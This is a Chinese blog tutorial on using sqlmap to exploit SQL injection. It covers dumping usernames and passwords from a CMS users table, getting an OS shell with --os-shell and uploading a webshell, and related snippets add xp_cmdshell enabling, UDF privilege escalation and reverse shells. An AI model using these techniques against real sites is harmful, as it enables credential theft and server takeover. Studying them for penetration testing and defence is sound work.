Sqlmap使用及提权

最新推荐文章于 2024-04-23 18:14:43 发布
最新推荐文章于 2024-04-23 18:14:43 发布
阅读量9.1k 收藏 17
点赞数 12
分类专栏: 网络安全 文章标签: sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43757105/article/details/120799931
版权

目录

  一、获取账密

  ​二、Sqlmap提权 

一、获取账密

检查注入点,发现存在sql注入

--dbs  检查数据库名

 --current-user 当前连接数据库的用户名

-D "数据库名" 指定目标数据库名  --tables 列出数据库中所有的表名

  -T "cms_users" 指定目标表名为'cms_users'   --columns 列出所有的字段名

 -C 'username,password' 指定目标字段  --dump 列出字段内容          

二、Sqlmap提权 

上面已经知道该站存在sql注入漏洞,利用--os-shell 从注入点获得一个交互式的 shell

执行 --os-shell参数命令:

选择web应用服务器的语言,默认php

指定上传路径后,sqlmap 将在指定的目录生成了两个文件,分别用来执行系统命令和上传文件:

页面访问执行系统命令

页面访问用于上传任意文件的文件:

 上传一句话木马控制系统

同时sqlmap也可以拿到os-shell 

IDebugger_kxk
关注
  • 12
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 6
    评论
专栏目录
sqlmap提权
m0_51822230的博客
05-17 4285
mysql提权 一.os-shell提权 建立os-shell前提条件: ①必须要有dba权限 ②secure_file_priv必须为空,不然无法写入文件 这是secure_file_priv为null的情况下 这是secure_file_priv为空的情况下 ③知道网站的绝对路径 1、首先查看当前用户权限,是dba后进行os-shell建立 2、sqlmap -u “http://192.168.43.194/sqli/Less-1/?id=1” --os-shell 在这里选择网页语言,根据网页
网络安全中心常见sqlmap udf提权过程
信安路上……
12-04 770
sqlmap udf提权过程 0x01 UDF UDF(user defined function)用户自定义函数,是mysql的一个拓展接口。用户可以通过自定义函数实现在mysql中无法方便实现的功能,其添加的新函数都可以在sql语句中调用,就像调用本机函数一样。 0x02 windows下udf提权的条件 如果mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的l...
mssql数据库提权
最新发布
weixin_53639243的博客
04-23 521
获取数据库密码翻配置文件:conn.asp(asp站点) ,web.config(aspx站点) , db.inc暴力破解微软的SQL Server在提权过程中往往也会给我们很大帮助,尤其是当找到SA用户的密码时,系统权限就基本到手了前提是必须获取SA用户的密码(SA用户具有最高权限)在连接成功后在sql命令处执行:就能成功的创建一个账户aaa并且加到管理员组:如果执行sql语句不成功,首先检查判断xp_cmdshell是否存在:返回1是存在的。
SQLmap注入获取Webshell及系统权限研究.pdf
06-08
SQLmap注入获取Webshell及系统权限研究
利用sqlmap进行mysql提权的小方法(win与liunx通用)
weixin_33916256的博客
10-12 930
文章作者:pt007@vip.sina.com文章来源:https://www.t00ls.net/thread-36196-1-1.html1.连接mysql数据打开一个交互shell:sqlmap.py -d mysql://root:root@127.0.0.1:3306/test --sql-shellselect @@version;select @@plugin_dir;d:\\wam...
sqlmap mysql root_MySQL数据库之利用sqlmap进行mysql提权的小方法(win与liunx通用)
weixin_42557830的博客
01-19 176
本文主要向大家介绍了MySQL数据库之利用sqlmap进行mysql提权的小方法(win与liunx通用) ,通过具体的内容向大家展现,希望对大家学习MySQL数据库有所帮助。1.连接mysql数据打开一个交互shell:sqlmap.py-dmysql://root:root@127.0.0.1:3306/test--sql-shellselect@@version;select@@p...
win环境下使用sqlmap写shell + MYSQL提权(默认就是system权限)
weixin_30606461的博客
01-23 1006
今天在来一个mysql提权 (也可以说是默认system权限提的) 在被黑站点找到一个站 先教拿shell是有注入漏洞的 有可能是root权限的注入点 可以确定是有注入漏洞的 也得到了 物理路径 这个是很有用的 如果是root权限的注入点 那我们可以考虑 写shellD:\wamp\www\js\content.php 有时候物理路径是很有用的上sqlmap注入 使用命令 这个是mys...
sql-server 提权
dieqiang4646的博客
09-19 186
  数据库开启cmdshell EXEC sp_configure 'show advanced options', 1 GO RECONFIGURE GO EXEC sp_configure 'xp_cmdshell',1 GO RECONFIGURE GO EXEC master..xp_cmdshell 'net use Z: \\192.168.11...
sqlmap使用手册
12-11
SQLMap是一款开源的自动化SQL注入工具,用于检测和利用SQL注入漏洞,对网站数据库进行探测、枚举、控制乃至提权。它适用于多种数据库管理系统,包括MySQL、PostgreSQL、Oracle、Microsoft SQL Server等。对于Web安全...
Linux利用UDF库实现Mysql提权
09-10
本篇将详细介绍如何利用UDF库来实现MySQL提权操作。 首先,提权通常涉及到获取更高的系统权限,而在MySQL中,通过UDF库可以执行系统级别的命令,从而可能达到提升权限的目的。要实现这一过程,我们需要满足以下...
sqlmap 使用手册
09-29
全面讲述了sqlmap使用,包括数据库信息的收集,数据库数据的获取,提权等。
sqlmap源代码开源
03-16
SQLmap是现在搞web人手一个的注入神器,不仅包含了主流数据库的SQL注入检测,而且包含提权以及后渗透模块。基于python2.x开发而成,使用方便。所以研究web安全少不了分析源码,学习代码的同时,也可以学习先进的漏洞...
内网渗透模拟演练:使用sqlmap对内网mssql提权与反弹shell
zh的博客
10-24 3909
准备:假设内网有一台2003服务器(使用mssql数据库),把网页服务80端口映射到防火墙8092端口,外网一台centos用来接收反弹shell 工具:sqlmap、msf、apache sqlmap进行注入 测试页面存在注入点 使用sqlmap进行注入 sqlmap -u "http://61.136.208.30:8092/Content.aspx?ClassId=1&id=4" -p "id" --dbms "mssql" 注入成功,获取到了服务器信息
mysql sqlmap_MySQL数据库之利用sqlmap进行mysql提权的小方法(win与liunx通用)
weixin_35829704的博客
01-18 473
本文主要向大家介绍了MySQL数据库之利用sqlmap进行mysql提权的小方法(win与liunx通用) ,通过具体的内容向大家展现,希望对大家学习MySQL数据库有所帮助。1.连接mysql数据打开一个交互shell:sqlmap.py-dmysql://root:root@127.0.0.1:3306/test--sql-shellselect@@version;select@@p...
sqlmap注入及ms16-075提权总结
weixin_33696106的博客
06-04 940
sqlmap注入及ms16-075提权总结(1)sqlmap执行命令sqlmap.py -r 1**.***.***.***.txtsqlmap.py -r 1**.***.***.***.txt --is-dbsqlmap.py -r 1**.***.***.***.txt --password --batchsqlmap.py -r 1**.***.***.***.txt --os-shell...
sqlmap(超超超详细使用教程)——实例说明最后介绍提权和绕过waf狗的脚本
记录并分享学习安全的知识点..
12-31 1127
一、明确使用sqlmap进行sql注入操作流程: (1)判断可注入的参数 (2)判断可以用那种SQL注入技术来注入 (3)识别出哪种数据库 (4)根据用户选择,读取哪些数据 二、目标后所接的参数说明 -u +URL -d #直连数据库,"mysql://root:root@192.168.1.1:3306/mysql" -l #从Burp代理日志文件中解析目标地址 -m #从文本文件中批量获取目标 -r #从文件中读取 HTTP 请求 --purge #清除历史缓存 --flush-sessi.
TRY HACK ME | GAME ZONE 「SQLMAP+利用反向SSH提权
AKAHRZ的博客
05-06 1481
TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起进步、一起GET THE FLAG! Steel Mountain「利用powershell提权」THM靶场:Steel MountainTASK1 谁是最佳员工?TASK2 获得初始 shellT.
利用cobaltstrike加sqlmap拿下一个网站并提权
weixin_45945976的博客
10-21 1180
利用cobaltstrike加sqlmap拿下一个网站并提权 Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。 Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe
sqlmap mysql 登录_利用sqlmap进行mysql提权的小方法(win与liunx通用)
weixin_39745269的博客
01-25 114
标签:文章作者:pt007@vip.sina.com文章来源:https://www.t00ls.net/thread-36196-1-1.html1.连接mysql数据打开一个交互shell:sqlmap.py -d mysql://root:root@127.0.0.1:3306/test --sql-shellselect @@version;select @@plugin_dir;d:\\...
sqlmap 拿到webshell提权
09-08
sqlmap拿到webshell后,可以通过一些方法来提升权限。一种方法是使用"cmd"命令执行功能来执行系统命令,这样可以获取更高的操作权限。另一种方法是使用"upload"功能点来上传文件,这样可以在服务器上执行自己的代码,从而进一步控制服务器。 具体来说,sqlmap在指定的目录中生成了两个文件,其中一个是用来执行系统命令的"tmpbeewq.php",另一个是用来上传文件的"tmpuqvgw.php"。要提权,可以使用这些文件来执行特权操作。 此外,如果在注入过程中发现了绝对路径或者存在数据库的dba权限,可以使用"––is–dba"参数来进行提权。如果无法成功提权,可以尝试扫描后台,并尝试使用管理员账户密码登录webshell进行提权。还可以使用"into outfile"方法来将数据库中的数据导出到文件,进而实现提权。 总的来说,sqlmap拿到webshell后,可以通过执行系统命令、上传文件和其他提权技术来提升权限,以便更好地控制服务器。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

IDebugger_kxk

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值